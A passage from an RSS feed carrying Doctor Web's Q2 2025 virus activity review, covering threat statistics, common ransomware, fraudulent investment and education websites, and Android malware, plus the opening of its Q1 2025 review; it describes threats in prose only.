  &lt;/p&gt;
  &lt;p&gt;
    Over the course of the second quarter, our Internet analysts uncovered many new fraudulent websites. 
    Among them were websites of non-existent educational platforms that supposedly allowed potential victims 
    to undergo online training and improve their qualifications. There were also more investment-themed websites promising quick and easy money.
  &lt;/p&gt;
  &lt;p&gt;
    The detection statistics on mobile devices showed a decrease in activity of the part of &lt;a href="https://vms.drweb.com/search/?q=Android.HiddenAds&amp;lng=en"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt; 
    ad-displaying trojans. However, this malware family remains the most widespread Android threat. At the same time, our 
    virus laboratory detected many new threats on Google Play.
  &lt;/p&gt;
  &lt;div class="colorful"&gt;
    &lt;h3&gt;Principal trends in Q2 2025&lt;/h3&gt;
    &lt;ul&gt;
      &lt;li&gt;The number of threats detected on protected devices decreased&lt;/li&gt;
      &lt;li&gt;Unique threats used in attacks were detected in decreased numbers&lt;/li&gt;
      &lt;li&gt;Many fraudulent websites, allegedly related to the education sector and finances, emerged&lt;/li&gt;
      &lt;li&gt;A spyware trojan attack targeting Russian military personnel was detected; the attack exploited popular mapping software for Android devices&lt;/li&gt;
      &lt;li&gt;A trojan designed to steal cryptocurrency was found in the firmware of a variety of Android smartphones&lt;/li&gt;
      &lt;li&gt;&lt;a href="https://vms.drweb.com/search/?q=Android.HiddenAds&amp;lng=en"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt; adware trojans remain among the most widespread Android threats&lt;/li&gt;
      &lt;li&gt;More malicious and unwanted programs were detected on Google Play&lt;/li&gt;
    &lt;/ul&gt;
  &lt;/div&gt;
&lt;/section&gt;

&lt;section class="margTM margBM" id="stat"&gt;
  &lt;h3&gt;According to Doctor Web’s statistics service&lt;/h3&gt;
  &lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2025/july/review_common_q2/01_stat_q2_2025_en.png" class="preview"&gt;
      &lt;img src="https://st.drweb.com/static/new-www/news/2025/july/review_common_q2/01_stat_q2_2025_en.png" alt="stat_2025_Q2"&gt;
    &lt;/a&gt;
  &lt;/div&gt;
  &lt;p&gt;The most common threats in Q2 2025:&lt;/p&gt;
  &lt;dl class="dlList"&gt;
    &lt;dt&gt;&lt;b&gt;VBS.KeySender.6&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;A malicious script that, in an infinite loop, searches for windows containing the text &lt;span class="string"&gt;mode extensions&lt;/span&gt;, &lt;span class="string"&gt;разработчика&lt;/span&gt;, and &lt;span class="string"&gt;розробника&lt;/span&gt; and sends them an Escape key press event, forcibly closing them.&lt;/dd&gt; 
    &lt;dt&gt;&lt;b&gt;Adware.Downware.20091&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Adware that often serves as an intermediary installer of pirated software.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Trojan.BPlug.4242&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;b&gt;Trojan.BPlug.3814&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;The detection name for malicious components of the WinSafe browser extension. These components are JavaScript files that display intrusive ads in browsers.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Trojan.Siggen30.53926&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;The detection name of an Electron framework host process modified by threat actors. It mimics a Steam application component (Steam Client WebHelper) and loads a JavaScript backdoor.&lt;/dd&gt;
  &lt;/dl&gt;
  &lt;h3 class="alignCenter"&gt;Statistics for malware discovered in email traffic&lt;/h3&gt;
  &lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2025/july/review_common_q2/02_mail_traffic_q2_2025_en.png" class="preview"&gt;
      &lt;img src="https://st.drweb.com/static/new-www/news/2025/july/review_common_q2/02_mail_traffic_q2_2025_en.png" alt="mail_traffic_2025_Q2"&gt;
    &lt;/a&gt;
  &lt;/div&gt;
  &lt;dl class="dlList"&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=JS.Siggen5.44590&amp;lng=en"&gt;&lt;b&gt;JS.Siggen5.44590&lt;/b&gt;&lt;/a&gt;&lt;/dt&gt;
    &lt;dd&gt;Malicious code added to the es5-ext-main public JavaScript library. It shows a specific message if the package is installed on a server with the time zone of a Russian city.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;JS.Inject&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;A family of malicious JavaScripts that inject a malicious script into the HTML code of webpages.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Win32.HLLW.Rendoc.3&amp;lng=en"&gt;&lt;b&gt;Win32.HLLW.Rendoc.3&lt;/b&gt;&lt;/a&gt;&lt;/dt&gt;
    &lt;dd&gt;A network worm that spreads via removeable storage media and other channels.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;W97M.DownLoader.2938&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;A family of downloader trojans that exploit vulnerabilities in Microsoft Office documents. They can also download other malicious programs to a compromised computer.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;PDF.Phisher.867&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;PDF documents used in phishing newsletters.&lt;/dd&gt;
  &lt;/dl&gt;
&lt;/section&gt;

&lt;section class="margTM margBM" id="encruptor"&gt;
  &lt;h3&gt;Encryption ransomware&lt;/h3&gt;
  &lt;p&gt;
    In Q2 2025, the number of requests made to decrypt files affected by encoder trojans decreased by 14.65%, compared to Q1 2025.
  &lt;/p&gt;
  &lt;p&gt;
    The dynamics of the decryption requests received by Doctor Web’s technical support service:
  &lt;/p&gt;
  &lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2025/july/review_common_q2/03_encoder_requests_q2_2025_en.png" class="preview"&gt;
      &lt;img src="https://st.drweb.com/static/new-www/news/2025/july/review_common_q2/03_encoder_requests_q2_2025_en.png" alt="encoder_stat_2025_Q2"&gt;
    &lt;/a&gt;
  &lt;/div&gt;
  &lt;p&gt;The most common encoders of Q2 2025:&lt;/p&gt;
  &lt;ul&gt;
    &lt;li&gt;&lt;b&gt;Trojan.Encoder.35534&lt;/b&gt; — 24.41% of user requests&lt;/li&gt;
    &lt;li&gt;&lt;a href="https://vms.drweb.com/search/?q=Trojan.Encoder.35209&amp;lng=en"&gt;&lt;b&gt;Trojan.Encoder.35209&lt;/b&gt;&lt;/a&gt; — 4.41% of user requests&lt;/li&gt;
    &lt;li&gt;&lt;b&gt;Trojan.Encoder.29750 &lt;/b&gt; — 2.71% of user requests&lt;/li&gt;
    &lt;li&gt;&lt;b&gt;Trojan.Encoder.35067&lt;/b&gt; — 2.71% of user requests&lt;/li&gt;
    &lt;li&gt;&lt;b&gt;Trojan.Encoder.41868 &lt;/b&gt; — 2.71% of user requests&lt;/li&gt;
  &lt;/ul&gt;
&lt;/section&gt;

&lt;section class="margTM margBM" id="netfraud"&gt;
  &lt;h3&gt;Network fraud&lt;/h3&gt;
  &lt;p&gt;
    Over the course of the second quarter, Doctor Web’s Internet analysts detected many fraudulent websites 
    supposedly related to the education sector. Online resources offering training in various professions became widespread. 
    For example, the &lt;i&gt;SMM Академия&lt;/i&gt; (“SMM Academy”) and &lt;i&gt;LearnIT KZ&lt;/i&gt; platforms, designed for Kazakhstani users, 
    supposedly allowed them to “master the SMM manager profession in 3 months” and “become a data analyst”.
  &lt;/p&gt;
  &lt;div class="img img-two"&gt;
      &lt;a href="https://st.drweb.com/static/new-www/news/2025/july/review_common_q2/04_q2_2025_fraud.png" class="preview"&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/july/review_common_q2/04_q2_2025_fraud.png" alt="Net Fraud" style="max-width: 350px;"&gt;
      &lt;/a&gt;
      &lt;a href="https://st.drweb.com/static/new-www/news/2025/july/review_common_q2/05_q2_2025_fraud.png" class="preview"&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/july/review_common_q2/05_q2_2025_fraud.1.png" alt="Net Fraud" style="max-width: 350px;"&gt;
      &lt;/a&gt;
  &lt;/div&gt;
  &lt;p&gt;
    On other websites, potential victims were allegedly able to access various courses. Among them were courses for learning English 
    and for gaining capital management skills—from the &lt;i&gt;EnglishPro&lt;/i&gt; and &lt;i&gt;FinCourse&lt;/i&gt; “platforms”, respectively:
  &lt;/p&gt;
  &lt;div class="img img-two"&gt;
      &lt;a href="https://st.drweb.com/static/new-www/news/2025/july/review_common_q2/06_q2_2025_fraud.png" class="preview"&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/july/review_common_q2/06_q2_2025_fraud.png" alt="Net Fraud" style="max-width: 350px;"&gt;
      &lt;/a&gt;
      &lt;a href="https://st.drweb.com/static/new-www/news/2025/july/review_common_q2/07_q2_2025_fraud.png" class="preview"&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/july/review_common_q2/07_q2_2025_fraud.1.png" alt="Net Fraud" style="max-width: 350px;"&gt;
      &lt;/a&gt;
  &lt;/div&gt;
  &lt;p&gt;
    And the fraudulent website of a certain service called &lt;i&gt;Финансовое Образование&lt;/i&gt; (“Financial Education”) could supposedly 
    help users improve their financial literacy. It offered visitors the chance to “master their finances and guarantee their future”:
  &lt;/p&gt;
  &lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2025/july/review_common_q2/08_q2_2025_fraud.png" class="preview"&gt;
      &lt;img src="https://st.drweb.com/static/new-www/news/2025/july/review_common_q2/08_q2_2025_fraud.png" alt="Net Fraud"&gt;
    &lt;/a&gt;
  &lt;/div&gt;
  &lt;p&gt;
    To “access” their advertised services, such websites ask users to register an account by providing personal data, 
    like their name, mobile phone number, email address, etc. Such data accumulates in the criminals’ hands and can 
    later be used in various fraudulent schemes.
  &lt;/p&gt;
  &lt;p&gt;
    At the same time, new fraudulent websites appeared for pseudo-investment projects that cybercriminals often presented 
    as allegedly being related to well-known companies and services. For instance, one offered users the opportunity to become 
    participants in an innovative project based on AI (artificial intelligence) technologies. This “project” was passed off as 
    a service from the Audi automobile concern and supposedly allowed cryptocurrencies to be traded automatically and a guaranteed 
    high income to be received. For “accessing” the service, a starting sum of €250 was required.
  &lt;/p&gt;
  &lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2025/july/review_common_q2/09_q2_2025_fraud.png" class="preview"&gt;
      &lt;img src="https://st.drweb.com/static/new-www/news/2025/july/review_common_q2/09_q2_2025_fraud.png" alt="Net Fraud"&gt;
    &lt;/a&gt;
  &lt;/div&gt;
  &lt;p&gt;
    Another “investment project” was allegedly related to the &lt;i&gt;TikTok&lt;/i&gt; social network. Visitors to the fraudulent website were 
    asked to complete a short survey and then provide personal information for registering and accessing the promised service:
  &lt;/p&gt;
  &lt;div class="img img-two"&gt;
      &lt;a href="https://st.drweb.com/static/new-www/news/2025/july/review_common_q2/10_q2_2025_fraud_1.png" class="preview"&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/july/review_common_q2/10_q2_2025_fraud_1.1.png" alt="Net Fraud" style="max-width: 350px;"&gt;
      &lt;/a&gt;
      &lt;a href="https://st.drweb.com/static/new-www/news/2025/july/review_common_q2/10_q2_2025_fraud_2.png" class="preview"&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/july/review_common_q2/10_q2_2025_fraud_2.1.png" alt="Net Fraud" style="max-width: 350px;"&gt;
      &lt;/a&gt;
  &lt;/div&gt;
  &lt;p&gt;
    Moreover, other fraudulent websites were discovered that were camouflaged as official online resources for the &lt;i&gt;WhatsApp&lt;/i&gt; messenger. 
    One of them offered visitors the opportunity to receive digital coins, each of which “brings the owner €15 a day”. The user supposedly 
    received 160 of these coins, but to begin “earning money on them”, they were asked to register an account by providing personal data. 
    In reality, the potential victim did not get any digital assets, and their data ended up in the hands of the scammers.
  &lt;/p&gt;
  &lt;div class="img img-two"&gt;
      &lt;a href="https://st.drweb.com/static/new-www/news/2025/july/review_common_q2/11_q2_2025_fraud_1.png" class="preview"&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/july/review_common_q2/11_q2_2025_fraud_1.1.png" alt="Net Fraud" style="max-width: 350px;"&gt;
      &lt;/a&gt;
      &lt;a href="https://st.drweb.com/static/new-www/news/2025/july/review_common_q2/11_q2_2025_fraud_2.png" class="preview"&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/july/review_common_q2/11_q2_2025_fraud_2.1.png" alt="Net Fraud" style="max-width: 350px;"&gt;
      &lt;/a&gt;
  &lt;/div&gt;
  &lt;p&gt;
    Another fake &lt;i&gt;WhatsApp&lt;/i&gt; website supposedly granted access to yet another trading bot, based on some so-called unique developments. 
    Users were asked to “run the &lt;i&gt;WhatsApp Bot&lt;/i&gt; and make money automatically”. For this, they were traditionally required to register 
    by indicating their personal data, which was then transferred to the threat actors.
  &lt;/p&gt;
  &lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2025/july/review_common_q2/12_q2_2025_fraud.png" class="preview"&gt;
      &lt;img src="https://st.drweb.com/static/new-www/news/2025/july/review_common_q2/12_q2_2025_fraud.png" alt="Net Fraud"&gt;
    &lt;/a&gt;
  &lt;/div&gt;
  &lt;p&gt;
    Fraudsters also targeted users from specific countries. For example, Russian citizens could encounter websites offering them the opportunity 
    to “make their dreams come true” with the help of this or that investment service. Malicious actors utilized the same template to design such 
    websites, only changing the appearance and the names of the non-existent projects.
  &lt;/p&gt;
  &lt;div class="img img-two"&gt;
      &lt;a href="https://st.drweb.com/static/new-www/news/2025/july/review_common_q2/13_q2_2025_fraud_1.png" class="preview"&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/july/review_common_q2/13_q2_2025_fraud_1.png" alt="Net Fraud" style="max-width: 350px;"&gt;
      &lt;/a&gt;
      &lt;a href="https://st.drweb.com/static/new-www/news/2025/july/review_common_q2/13_q2_2025_fraud_2.png" class="preview"&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/july/review_common_q2/13_q2_2025_fraud_2.png" alt="Net Fraud" style="max-width: 350px;"&gt;
      &lt;/a&gt;
  &lt;/div&gt;
  &lt;p&gt;
    It is noteworthy that websites based on the same template were also created for residents of other countries, for example, Uzbekistan:
  &lt;/p&gt;
  &lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2025/july/review_common_q2/14_q2_2025_fraud.png" class="preview"&gt;
      &lt;img src="https://st.drweb.com/static/new-www/news/2025/july/review_common_q2/14_q2_2025_fraud.png" alt="Net Fraud"&gt;
    &lt;/a&gt;
  &lt;/div&gt;
  &lt;p&gt;
    One fraudulent website that was discovered lured Russian-speaking users living in Europe. On this website, 
    cybercriminals promised potential victims a passive income of up to €1000 per week “with the help of innovative, 
    new-generation financial solutions” from some platform called &lt;i&gt;LevelUPTrade&lt;/i&gt;:
  &lt;/p&gt;
  &lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2025/july/review_common_q2/15_q2_2025_fraud.png" class="preview"&gt;
      &lt;img src="https://st.drweb.com/static/new-www/news/2025/july/review_common_q2/15_q2_2025_fraud.png" alt="Net Fraud"&gt;
    &lt;/a&gt;
  &lt;/div&gt;
  &lt;p&gt;
    French users could become victims of malicious actors offering the chance to access the non-existent 
    &lt;i&gt;TraderAI&lt;/i&gt; automated trading software. With its help, potential victims allegedly had the opportunity to earn a hefty sum, starting from €3500:
  &lt;/p&gt;
  &lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2025/july/review_common_q2/16_q2_2025_fraud.png" class="preview"&gt;
      &lt;img src="https://st.drweb.com/static/new-www/news/2025/july/review_common_q2/16_q2_2025_fraud.png" alt="Net Fraud"&gt;
    &lt;/a&gt;
  &lt;/div&gt;
  &lt;p&gt;
    For Mexican citizens, scammers prepared an “intellectual trading system” called &lt;i&gt;QuantumIA&lt;/i&gt;. This is one of many variants of 
    the well-known pseudo-trading system known as &lt;i&gt;Quantum System&lt;/i&gt; or &lt;i&gt;QuantumAI&lt;/i&gt;, which supposedly allows automatic trading to take 
    place in financial markets using quantum computing and artificial intelligence technologies.
  &lt;/p&gt;
  &lt;div class="img img-two"&gt;
      &lt;a href="https://st.drweb.com/static/new-www/news/2025/july/review_common_q2/17_q2_2025_fraud_1.png" class="preview"&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/july/review_common_q2/17_q2_2025_fraud_1.1.png" alt="Net Fraud" style="max-width: 350px;"&gt;
      &lt;/a&gt;
      &lt;a href="https://st.drweb.com/static/new-www/news/2025/july/review_common_q2/17_q2_2025_fraud_2.png" class="preview"&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/july/review_common_q2/17_q2_2025_fraud_2.png" alt="Net Fraud" style="max-width: 350px;"&gt;
      &lt;/a&gt;
  &lt;/div&gt;
  &lt;p&gt;
    On another website, fraudsters, allegedly on behalf of a large bank, offered Mexican users some investment services. 
    Potential victims were promised that they could make 16,000 Mexican pesos within a short period of time after registering. 
    For this, they were asked to provide their personal data.
  &lt;/p&gt;
  &lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2025/july/review_common_q2/18_q2_2025_fraud.png" class="preview"&gt;
      &lt;img src="https://st.drweb.com/static/new-www/news/2025/july/review_common_q2/18_q2_2025_fraud.png" alt="Net Fraud"&gt;
    &lt;/a&gt;
  &lt;/div&gt;
  &lt;p&gt;
    German users risked falling victim to the fake trading platform &lt;i&gt;Lucrosa Infinity&lt;/i&gt;. Its image has been exploited 
    in one form or another by cybercriminals for several years. On one fraudulent website, threat actors offered users 
    the opportunity to “start investing and open the door to financial independence”.
  &lt;/p&gt;
  &lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2025/july/review_common_q2/19_q2_2025_fraud.png" class="preview"&gt;
      &lt;img src="https://st.drweb.com/static/new-www/news/2025/july/review_common_q2/19_q2_2025_fraud.png" alt="Net Fraud"&gt;
    &lt;/a&gt;
  &lt;/div&gt;
  &lt;p&gt;
    Cybercriminals also offered Canadian users the opportunity to use “unique” services that allegedly provide high income through investments 
    and cryptocurrency trading. Among the uncovered fraudulent websites, for example, were those advertising “platforms” like &lt;i&gt;BitcoinFusionPro&lt;/i&gt; 
    and &lt;i&gt;BitcoinReaction&lt;/i&gt;. These supposedly allowed clients to make at least 1,000 Canadian dollars per day by investing “only” 350 dollars:
  &lt;/p&gt;
  &lt;div class="img img-two"&gt;
      &lt;a href="https://st.drweb.com/static/new-www/news/2025/july/review_common_q2/20_q2_2025_fraud.png" class="preview"&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/july/review_common_q2/20_q2_2025_fraud.2.png" alt="Net Fraud" style="max-width: 350px;"&gt;
      &lt;/a&gt;
      &lt;a href="https://st.drweb.com/static/new-www/news/2025/july/review_common_q2/21_q2_2025_fraud.png" class="preview"&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/july/review_common_q2/21_q2_2025_fraud.png" alt="Net Fraud" style="max-width: 350px;"&gt;
      &lt;/a&gt;
  &lt;/div&gt;
  &lt;p&gt;
    Users from Poland also encountered similar websites. On one of them, scammers promised their potential victims earnings from $950 to $2,200 
    a day with “the most advanced cryptocurrency management software in the world”:
  &lt;/p&gt;
  &lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2025/july/review_common_q2/22_q2_2025_fraud.png" class="preview"&gt;
      &lt;img src="https://st.drweb.com/static/new-www/news/2025/july/review_common_q2/22_q2_2025_fraud.png" alt="Net Fraud"&gt;
    &lt;/a&gt;
  &lt;/div&gt;
  &lt;p&gt;
    Another website offered them €250 to invest and then earn €700 daily:
  &lt;/p&gt;
  &lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2025/july/review_common_q2/23_q2_2025_fraud.png" class="preview"&gt;
      &lt;img src="https://st.drweb.com/static/new-www/news/2025/july/review_common_q2/23_q2_2025_fraud.png" alt="Net Fraud"&gt;
    &lt;/a&gt;
  &lt;/div&gt;
  &lt;p&gt;
    One fraudulent website promised Polish users “the opportunity to work from home and make decent money” thanks to the automated system &lt;i&gt;Click Money&lt;/i&gt;. 
    With its help, people without trading experience could allegedly earn up to 64,000,000 Polish zlotys annually:
  &lt;/p&gt;
  &lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2025/july/review_common_q2/24_q2_2025_fraud.png" class="preview"&gt;
      &lt;img src="https://st.drweb.com/static/new-www/news/2025/july/review_common_q2/24_q2_2025_fraud.png" alt="Net Fraud"&gt;
    &lt;/a&gt;
  &lt;/div&gt;
  &lt;div class="notrecommend"&gt;
    &lt;a href="http://antifraud.drweb.com/dangerous_urls/" target="_blank"&gt;Find out more about Dr.Web non-recommended sites&lt;/a&gt;
  &lt;/div&gt;
&lt;/section&gt;

&lt;section class="margTM margBM" id="formobile"&gt;
    &lt;h3&gt;Malicious and unwanted programs for mobile devices&lt;/h3&gt;
    &lt;p&gt;
        According to detection statistics collected by Dr.Web Security Space for mobile devices, in Q2 2025, 
        &lt;a href="https://vms.drweb.com/search/?q=Android.HiddenAds&amp;lng=en"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt; ad-displaying trojans were most commonly detected on protected devices. 
        Compared to the previous quarter, users encountered them somewhat less frequently. Next came adware 
        trojans from the &lt;a href="https://vms.drweb.com/search/?q=Android.MobiDash&amp;lng=en"&gt;&lt;b&gt;Android.MobiDash&lt;/b&gt;&lt;/a&gt; family and 
        &lt;a href="https://vms.drweb.com/search/?q=Android.FakeApp&amp;lng=en"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt; malicious fake programs; the activity of the former increased, while that of the latter decreased.
    &lt;/p&gt;
    &lt;p&gt;
        Mixed dynamics were also observed with banking trojans. For example, more attacks by representatives of the 
        &lt;a href="https://vms.drweb.com/search/?q=Android.Banker&amp;lng=en"&gt;&lt;b&gt;Android.Banker&lt;/b&gt;&lt;/a&gt; family were recorded. At the same time, trojans from the &lt;a href="https://vms.drweb.com/search/?q=Android.BankBot&amp;lng=en"&gt;&lt;b&gt;Android.BankBot&lt;/b&gt;&lt;/a&gt; and &lt;b&gt;Android.SpyMax&lt;/b&gt; 
        families were detected less often on protected devices.
    &lt;/p&gt;
    &lt;p&gt;
        In the second quarter, Doctor Web’s specialists 
        &lt;a href="https://news.drweb.com/show/?lng=en&amp;i=15002" target="_blank"&gt;discovered&lt;/a&gt; the &lt;a href="https://vms.drweb.com/search/?q=Android.Clipper.31&amp;lng=en"&gt;&lt;b&gt;Android.Clipper.31&lt;/b&gt;&lt;/a&gt; 
        trojan in the firmware of a number of Android smartphone models. This malicious app was hidden in one of the &lt;i&gt;WhatsApp&lt;/i&gt; 
        messenger versions modified by attackers and was used to steal cryptocurrency from the owners of infected devices. 
        Moreover, our virus analysts &lt;a href="https://news.drweb.com/show/?lng=en&amp;i=15006" target="_blank"&gt;uncovered&lt;/a&gt; 
        the &lt;a href="https://vms.drweb.com/search/?q=Android.Spy.1292.origin&amp;lng=en"&gt;&lt;b&gt;Android.Spy.1292.origin&lt;/b&gt;&lt;/a&gt; malicious program. Cybercriminals embedded it into one version of Alpine Quest mapping 
        software and used it to spy on Russian military personnel.
    &lt;/p&gt;
    &lt;p&gt;
        Over the course of the last 3 months, dozens of threats have been detected on Google Play. 
        Among them were malicious fake apps from the &lt;a href="https://vms.drweb.com/search/?q=Android.FakeApp&amp;lng=en"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt; 
        family and new unwanted ad-displaying software &lt;b&gt;Adware.Adpush.21912&lt;/b&gt;.
    &lt;/p&gt;
    &lt;p&gt;
        The following Q2 2025 events involving mobile malware are the most noteworthy:
    &lt;/p&gt;
    &lt;ul&gt;
        &lt;li&gt;&lt;a href="https://vms.drweb.com/search/?q=Android.HiddenAds&amp;lng=en"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt; ad-displaying trojans were less active.&lt;/li&gt;
        &lt;li&gt;&lt;a href="https://vms.drweb.com/search/?q=Android.MobiDash&amp;lng=en"&gt;&lt;b&gt;Android.MobiDash&lt;/b&gt;&lt;/a&gt; adware trojan activity increased.&lt;/li&gt;
        &lt;li&gt;&lt;a href="https://vms.drweb.com/search/?q=Android.Banker&amp;lng=en"&gt;&lt;b&gt;Android.Banker&lt;/b&gt;&lt;/a&gt; banking trojans were detected more often on protected devices, compared to the first quarter.&lt;/li&gt;
        &lt;li&gt;The number of &lt;a href="https://vms.drweb.com/search/?q=Android.BankBot&amp;lng=en"&gt;&lt;b&gt;Android.BankBot&lt;/b&gt;&lt;/a&gt; and &lt;b&gt;Android.SpyMax&lt;/b&gt; banking trojan attacks decreased.&lt;/li&gt;
        &lt;li&gt;A trojan designed to steal cryptocurrency was found in the firmware of several Android smartphone models.&lt;/li&gt;
        &lt;li&gt;A spyware trojan targeting Russian military personnel was discovered.&lt;/li&gt;
        &lt;li&gt;New threats emerged on Google Play.&lt;/li&gt;
    &lt;/ul&gt;
    &lt;p&gt;
      To find out more about the security-threat landscape for mobile devices in Q2 2025, read our &lt;a href="" target="_blank"&gt;special overview&lt;/a&gt;.
    &lt;/p&gt;
&lt;/section&gt;</description></item><item><guid>https://news.drweb.com/show/?i=14992&amp;lng=en</guid><title>Doctor Web’s Q1 2025 virus activity review</title><link>https://news.drweb.com/show/?i=14992&amp;lng=en&amp;c=9</link><pubDate>Thu, 27 Mar 2025 00:00:00 GMT</pubDate><description>



&lt;p&gt;&lt;b&gt;March 27, 2025&lt;/b&gt;&lt;/p&gt;

&lt;section class="margTM margBM" id="main"&gt;
  &lt;p&gt;&lt;newslead&gt;According to statistics collected by the Dr.Web anti-virus, the total number of threats detected in the first quarter of 2025 increased by 7.23%, compared to the fourth quarter of 2024. At the same time, the number of unique threats decreased by almost a third—27.59%. This suggests that, while increasing the intensity of their attacks, threat actors were using the same malicious and unwanted applications in them more often. Malicious scripts with different functionality, ad-displaying trojans, and adware apps were the most widespread threats.&lt;/newslead&gt;&lt;/p&gt;
  &lt;p&gt;
    In email traffic, trojan droppers and downloaders, adware software, malicious scripts, and trojans designed to run various threats on attacked computers were most frequently detected.
  &lt;/p&gt;
  &lt;p&gt;
    Users whose files were affected by encoder trojans had mostly encountered 
    &lt;b&gt;Trojan.Encoder.35534&lt;/b&gt;, &lt;a href="https://vms.drweb.com/search/?q=Trojan.Encoder.35209&amp;lng=en"&gt;&lt;b&gt;Trojan.Encoder.35209&lt;/b&gt;&lt;/a&gt;, and &lt;b&gt;Trojan.Encoder.35067&lt;/b&gt;.
  &lt;/p&gt;
  &lt;p&gt;
    In January, Doctor Web’s virus laboratory 
    &lt;a href="https://news.drweb.com/show/?i=14976&amp;lng=en" target="_blank" rel="noopener noreferrer"&gt;uncovered&lt;/a&gt; 
    an active Monero cryptocurrency mining campaign using many different trojans. To conceal some of them, threat actors utilized steganography, 
    a technique that allows some data to be hidden within other data—for example, inside images.
  &lt;/p&gt;
  &lt;p&gt;
    At the same time, over the course of the first quarter, our Internet analysts detected an increase in the number of fraudulent websites aimed at stealing Telegram messenger user accounts. 
  &lt;/p&gt;
  &lt;p&gt;
    In the mobile threats department, Doctor Web’s specialists observed increased activity on the part of adware trojans and some 
    banking trojans used to target the Android OS. In addition, they uncovered dozens of new malicious apps on Google Play.
  &lt;/p&gt;
  &lt;div class="paddXM paddYM bg_ocean_1 white custom-color-link"&gt;
    &lt;h4 class="white alignCenter"&gt;Principal trends in Q1 2025&lt;/h4&gt;
    &lt;ul&gt;
      &lt;li&gt;Threats were detected on protected devices in increasing numbers.&lt;/li&gt;
      &lt;li&gt;The quantity of unique threats used in attacks decreased.&lt;/li&gt;
      &lt;li&gt;Phishing sites designed to steal Telegram accounts became more prevalent.&lt;/li&gt;
      &lt;li&gt;Several widespread ad-displaying and banking trojan families, used to target the Android operating system, heightened their activity.&lt;/li&gt;
      &lt;li&gt;New malware emerged on Google Play.&lt;/li&gt;
    &lt;/ul&gt;
  &lt;/div&gt;
&lt;/section&gt;

&lt;section class="margTM margBM" id="stat"&gt;
  &lt;h2 class="alignCenter"&gt;According to Doctor Web’s statistics service&lt;/h2&gt;
  &lt;div class="column_grid_review column_grid_review--o"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2025/april/review_common_q1/01_stat_q1_2025_en.png" class="preview"&gt;
      &lt;img src="https://st.drweb.com/static/new-www/news/2025/april/review_common_q1/01_stat_q1_2025_en.png" alt="stat_2025_Q1"&gt;
    &lt;/a&gt;
  &lt;/div&gt;
  &lt;p&gt;The most common threats in Q1 2025:&lt;/p&gt;
  &lt;dl class="dlList"&gt;
    &lt;dt&gt;&lt;b&gt;VBS.KeySender.6&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;A malicious script that, in an infinite loop, searches for windows containing the text &lt;span class="string"&gt;mode extensions&lt;/span&gt;, &lt;span class="string"&gt;разработчика&lt;/span&gt;, and &lt;span class="string"&gt;розробника&lt;/span&gt; and sends them an Escape key press event, forcibly closing them.&lt;/dd&gt; 
    &lt;dt&gt;&lt;b&gt;Adware.Downware.20091&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Adware that often serves as an intermediary installer of pirated software.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Trojan.BPlug.4242&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;The detection name for malicious components of the WinSafe browser extension. These components are JavaScript files that display intrusive ads in browsers.&lt;/dd&gt;
